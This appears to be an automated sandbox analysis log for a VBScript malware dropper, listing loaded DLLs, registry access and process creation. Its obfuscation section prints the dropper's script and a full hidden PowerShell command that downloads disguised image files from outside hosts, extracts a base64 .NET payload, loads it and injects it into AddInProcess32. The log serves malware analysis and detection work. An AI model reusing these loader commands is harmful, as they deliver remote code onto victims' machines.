                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior

                  Data Obfuscation

                  barindex
                  Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("WScript.Shell") pitheco = ("$(@(?(@?@?dig@?@? = '") & enterrar & "'" pitheco = pitheco & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" pitheco = pitheco & "[??}@*y??}@*" pitheco = pitheco & "t?*(?" pitheco = pitheco & "m.(@(?(@?@?" pitheco = pitheco & "nv?*(?r" pitheco = pitheco & "t]:" pitheco = pitheco & ":Fr@?@?" pitheco = pitheco & "mba??}@*" pitheco = pitheco & "?*(?64??}@*tring( $(@(?(" pitheco = pitheco & "@?@?d" pitheco = pitheco & "ig@?@?.r?*(?" pitheco = pitheco & "@%*:&la" pitheco = pitheco & "(@(?(?*(?('" pitheco = pitheco & "DgTr?*(?" pitheco = pitheco & "','" pitheco = pitheco & "A" pitheco = pitheco & "') ))" pitheco = pitheco & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" pitheco = Replace(pitheco,"@%*:&","p") pitheco = Replace(pitheco,"(@(?(","c") pitheco = Replace(pitheco,"?*(?","e") pitheco = Replace(pitheco,"@?@?","o") pitheco = Replace(pitheco,"??}@*","s") excursar1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " excursar1 = Replace(excursar1,"(@(?(","c") excursar1 = Replace(excursar1,"??}@*","s") excursar1 = Replace(excursar1,"@?@?","o") excursar1 = Replace(excursar1,"@%*:&","p") excursar = excursar1 & """" & pitheco & """" Cama.Run excursar, 0, False IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/gK5wA", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8Dg
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8100AD pushad ; iretd 1_2_00007FFD9B8100C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_00E10610 push edx; retf 0000h4_2_00E1061A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4_2_06258C87 push esp; iretd 4_2_06258C91
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
